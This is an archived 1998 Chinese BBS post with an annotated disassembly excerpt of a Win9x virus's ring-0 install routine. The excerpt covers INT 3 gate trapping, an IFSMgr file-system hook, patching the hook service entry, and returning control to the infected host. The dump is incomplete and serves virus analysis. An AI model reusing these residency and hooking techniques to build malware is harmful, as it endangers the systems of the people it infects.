发信人: crazydiamond()
整理人: jia(1998-10-26 01:23:58), 站内信件
; (continued from the previous part)
;
; Disassembly excerpt of the virus' ring-0 install routine (Win9x, VxD /
; IFSMgr era). This is a disassembler dump at fixed addresses, not
; assemblable source; "......" marks stretches the original author left out.
; NOTE(review): edi/esi/ebx/ebp are loaded in the elided code, so every
; resolved target quoted below (000000E2, 000000B8, 0000004C) is the author's
; claim and cannot be re-derived from these lines alone.
:0000004A pop  esi
:0000004B int  03                                  ; second trap into ring 0 through the INT 3 gate the virus
                                                   ; hooked earlier (not shown); the handler installs the IFS hook
......
:00000063 je   00000097                            ; author: "already called once?" -> take the install path
                                                   ; (the compare feeding this je is elided)
......
:00000097 lea  eax, dword ptr [edi+FFFFFCF7]       ; eax = hook procedure address (edi-309h); author: resolves to 000000E2
:0000009D push eax
:0000009E vxdcall IFSMgr_InstallFileSystemApiHook  ; register the file-system API hook; eax = previous hook pointer
:000000A4 mov  dr0, eax                            ; stash the previous hook pointer in debug register DR0 instead of memory
:000000A7 pop  eax                                 ; eax = hook procedure address again
:000000A8 mov  ecx, dword ptr [esi+3D]             ; author: ecx -> service entry for IFSMgr_InstallFileSystemApiHook
:000000AB mov  edx, dword ptr [ecx]                ; edx = original entry
:000000AD mov  dword ptr [eax-04], edx             ; keep the original entry right below the virus' hook code
:000000B0 lea  eax, dword ptr [eax-2A]             ; eax = replacement entry; author: 000000B8
:000000B3 mov  dword ptr [ecx], eax                ; patch the entry so later hook installers pass through the virus
:000000B5 cli                                      ; interrupts stay off until the sti at 0000004C
:000000B6 jmp  0000006E
......
:0000006E mov  word ptr [ebx-04], bp               ; low 16 bits of the saved INT 3 handler offset -> gate offset_lo
:00000072 shr  ebp, 10
:00000075 mov  word ptr [ebx+02], bp               ; high 16 bits -> gate offset_hi (the -04/+02 pair matches an IDT gate
                                                   ; with ebx pointing 4 bytes in): original INT 3 gate restored
:00000079 iret                                     ; back to ring 3 at 0000004C
......
:0000004C sti
:0000004D xor  ebx, ebx
:0000004F jmp  00000058
:00000051 xor  ebx, ebx                            ; alternate entry, skipped on the normal path; presumably the
:00000053 mov  eax, dword ptr fs:[ebx]             ; exception-handler route: reload esp from the record fs:[0] points
:00000056 mov  esp, dword ptr [eax]                ; at -- TODO confirm against the elided setup code
:00000058 pop  dword ptr fs:[ebx]                  ; restore the host's original SEH chain head (fs:[0])
:0000005B pop  eax
:0000005C pop  ebp
:0000005D push 01002210                            ; host's original entry point (differs per infected file)
:00000062 ret                                      ; hand control back to the host; the hook remains installed
自此,病毒以IFS API Hook的形式驻留于ring0,并把控制权交还宿主程序;宿主看起来正常运行,而病毒在之后的文件系统调用中继续活动。
※ 来源:.广州网易 BBS bbs.nease.net.[FROM: 202.96.101.254]